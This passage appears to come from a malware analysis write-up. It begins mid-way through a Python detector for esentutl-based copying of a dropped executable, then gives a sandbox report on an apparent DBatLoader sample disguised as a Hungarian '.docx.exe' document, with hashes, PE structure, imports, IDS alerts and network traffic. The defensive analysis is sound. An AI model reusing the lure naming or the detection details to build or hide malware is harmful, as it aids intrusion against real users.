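    for ev in (parse_log(SAMPLE_LOG), parse_cmdline(SAMPLE_CMD), parse_cmdline(BENIGN_CMD)):
        print(ev, "->", assess(ev) or "no finding")
```

The byte count recovered from the transcript is worth keeping in the event: it ties the copy to the dropped PE of the same size without having to hash the destination, which the loader may already have executed or deleted. A legitimate esentutl copy of an .edb database produces no reasons and is not flagged.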
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.923151822709098
TrID:
• Win32 Executable (generic) a (10002005/4) 98.97%
• InstallShield setup (43055/19) 0.43%
• Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
• Windows Screen Saver (13104/52) 0.13%
• Win16/32 Executable Delphi generic (2074/23) 0.02%
File name:#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
File size:1'056'768 bytes
MD5:ffd79398ecb6b74ae4e751157796870b
SHA1:cedc86d9d511aa0b4ee0102cfcda83c7eb296afc
SHA256:5166f1f0d6693793e12932e324f36450126c907365ba4a9d45388831121bfcb1
SHA512:c732b704cc6f93272085442f939143a3afe91e93d3403905d83b7bebb4966a5c1d708832e1b89058f244c098fae91e99412ef7b7297a1321abbcbc37c7c4850a
SSDEEP:24576:/GBqWzMJ3rInJFhR1T6a3p6ZFlR+gKT44VoIOL7zk:/CHncaEYL6L
TLSH:74259E65F5794C65E03765399CCAA7AF982CBF782929B4C126F11B3C1E3A394340ED83
File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
Icon Hash:08302020c0c92020
Entrypoint:0x45f75c
Entrypoint Section:.itext
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics: (none set: the image opts into neither ASLR via DYNAMIC_BASE nor DEP via NX_COMPAT)
Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC] (the fixed link timestamp Borland Delphi compilers write into every image, not a real build time; together with the "MZP" DOS stub, the .itext entrypoint section and the TrID Delphi match it marks this as a Delphi-built executable, which is the toolchain DBatLoader is known for)
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:dc3a9be53431df0acf7fd7805ad1ffd7
                                                                                                                                                Instruction
                                                                                                                                                push ebp
                                                                                                                                                mov ebp, esp
                                                                                                                                                add esp, FFFFFFF0h
                                                                                                                                                mov eax, 0045E65Ch
                                                                                                                                                call 00007FF6D902083Dh
                                                                                                                                                mov eax, dword ptr [00461BC4h]
                                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                                call 00007FF6D90708A1h
                                                                                                                                                mov ecx, dword ptr [00461ACCh]
                                                                                                                                                mov eax, dword ptr [00461BC4h]
                                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                                mov edx, dword ptr [0045E358h]
                                                                                                                                                call 00007FF6D90708A1h
                                                                                                                                                mov eax, dword ptr [00461BC4h]
                                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                                call 00007FF6D9070915h
                                                                                                                                                call 00007FF6D901E848h
                                                                                                                                                lea eax, dword ptr [eax+00h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x66000 | 0x251a | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x72000 | 0x98800 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6b000 | 0x6a54 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x6a000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x666f4 | 0x5c8 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5d8a4 | 0x5da00 | 815a84730f5749f3dfdc2ead0f15d53c | False | 0.5232002044392523 | data | 6.516684340520826 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x5f000 | 0x7a4 | 0x800 | e5b5cd9472dc3374bf67fd8c3e7348b0 | False | 0.6025390625 | data | 6.04839172387159 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x60000 | 0x1d48 | 0x1e00 | 18fe7712ac951ef0d3212f00db31c0db | False | 0.3963541666666667 | data | 3.8273707838479356 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x62000 | 0x3694 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x66000 | 0x251a | 0x2600 | 76fb13664f876356eaf7f55873973c23 | False | 0.31743421052631576 | data | 4.991838466014285 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x69000 | 0x34 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x6a000 | 0x18 | 0x200 | 0ab743220a59789dd31052ef73d8848a | False | 0.05078125 | data | 0.2044881574398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x6b000 | 0x6a54 | 0x6c00 | a07db1380e85f1f900c3eeeee6fcf760 | False | 0.6312934027777778 | data | 6.655851461790188 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x72000 | 0x98800 | 0x98800 | 0720b9ce00f1ae5a18d03985410267ff | False | 0.4039094518442623 | data | 6.557634192523836 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x72af8 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0x72c2c | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0x72d60 | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0x72e94 | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0x72fc8 | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0x730fc | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0x73230 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_BITMAP | 0x73364 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0x73534 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | English | United States | 0.46487603305785125
RT_BITMAP | 0x73718 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0x738e8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39870689655172414
RT_BITMAP | 0x73ab8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.4245689655172414
RT_BITMAP | 0x73c88 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5021551724137931
RT_BITMAP | 0x73e58 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5064655172413793
RT_BITMAP | 0x74028 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0x741f8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5344827586206896
RT_BITMAP | 0x743c8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0x74598 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | English | United States | 0.4870689655172414
RT_ICON | 0x74680 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 1889 x 1889 px/m | | | 0.0979253112033195
RT_ICON | 0x76c28 | 0x15b7 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.908256880733945
RT_DIALOG | 0x781e0 | 0x52 | data | | | 0.7682926829268293
RT_DIALOG | 0x78234 | 0x52 | data | | | 0.7560975609756098
RT_STRING | 0x78288 | 0x68 | data | | | 0.5673076923076923
RT_STRING | 0x782f0 | 0x2e8 | data | | | 0.4583333333333333
RT_STRING | 0x785d8 | 0xb8 | data | | | 0.6793478260869565
RT_STRING | 0x78690 | 0xec | data | | | 0.6398305084745762
RT_STRING | 0x7877c | 0x2cc | data | | | 0.4622905027932961
RT_STRING | 0x78a48 | 0x3e8 | data | | | 0.382
RT_STRING | 0x78e30 | 0x370 | data | | | 0.4022727272727273
RT_STRING | 0x791a0 | 0x3cc | data | | | 0.33539094650205764
RT_STRING | 0x7956c | 0x214 | data | | | 0.49624060150375937
RT_STRING | 0x79780 | 0xcc | data | | | 0.6274509803921569
RT_STRING | 0x7984c | 0x194 | data | | | 0.5643564356435643
RT_STRING | 0x799e0 | 0x3c4 | data | | | 0.3288381742738589
RT_STRING | 0x79da4 | 0x338 | data | | | 0.42961165048543687
RT_STRING | 0x7a0dc | 0x294 | data | | | 0.42424242424242425
RT_RCDATA | 0x7a370 | 0x10 | data | | | 1.5
RT_RCDATA | 0x7a380 | 0x304 | data | | | 0.7033678756476683
RT_RCDATA | 0x7a684 | 0x7f7 | Delphi compiled form 'TSendForm' | | | 0.3957822461991172
RT_RCDATA | 0x7ae7c | 0x8f838 | PNG image data, 225 x 225, 8-bit colormap, non-interlaced | English | United States | 0.40548319928142734
RT_GROUP_CURSOR | 0x10a6b4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x10a6c8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x10a6dc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x10a6f0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x10a704 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x10a718 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x10a72c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_ICON | 0x10a740 | 0x22 | data | | | 1.0588235294117647
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll | CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExtTextOutA, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll | _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
comdlg32.dll | GetOpenFileNameA
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-11T19:17:05.224463+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.109.210.53 | 443 | 192.168.2.4 | 49734 | TCP
2024-11-11T19:17:43.068110+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.109.210.53 | 443 | 192.168.2.4 | 49741 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                Nov 11, 2024 19:16:47.939332008 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.939332962 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.939884901 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.939896107 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.939904928 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.939912081 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.939965010 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.940566063 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.940577984 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.940634966 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.941000938 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.941011906 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.941024065 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.941055059 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.941730022 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.941747904 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.941760063 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.941766977 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.941772938 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.941802979 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.942497015 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.942508936 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.942518950 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.942548990 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.942593098 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.943269014 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.943283081 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.943295956 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.943332911 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.944039106 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.944052935 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.944062948 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.944075108 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.944084883 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.944138050 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.944812059 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.944823980 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.944835901 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.944859028 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.944889069 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.945585012 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.945596933 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.945607901 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.945619106 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.945645094 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.945677042 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.946213007 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.946225882 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.946235895 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.946248055 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.946270943 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.946304083 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.947031975 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.947046995 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.947057962 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.947071075 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.947083950 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.947089911 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.947138071 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.947894096 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.947906971 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.947916985 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.947928905 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.947938919 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.947969913 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.948704004 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.948723078 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.948735952 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.948749065 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.948753119 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.948760986 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.948779106 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.948801041 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.949510098 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.949522972 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.949532986 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.949546099 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.949563980 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.949605942 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.950340986 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.950352907 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.950364113 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.950375080 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.950387001 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.950433969 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.951152086 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.951164961 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.951175928 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.951188087 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.951195955 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.951231956 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.951988935 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.952002048 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.952013016 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.952029943 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.952032089 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.952043056 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.952069044 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.952124119 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.952783108 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.952795029 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.952806950 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.952817917 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.952830076 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.952841043 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.952904940 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.953778028 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.953790903 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.953802109 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.953813076 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.953813076 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:47.953824997 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:47.953838110 CET804973192.114.2.230192.168.2.4
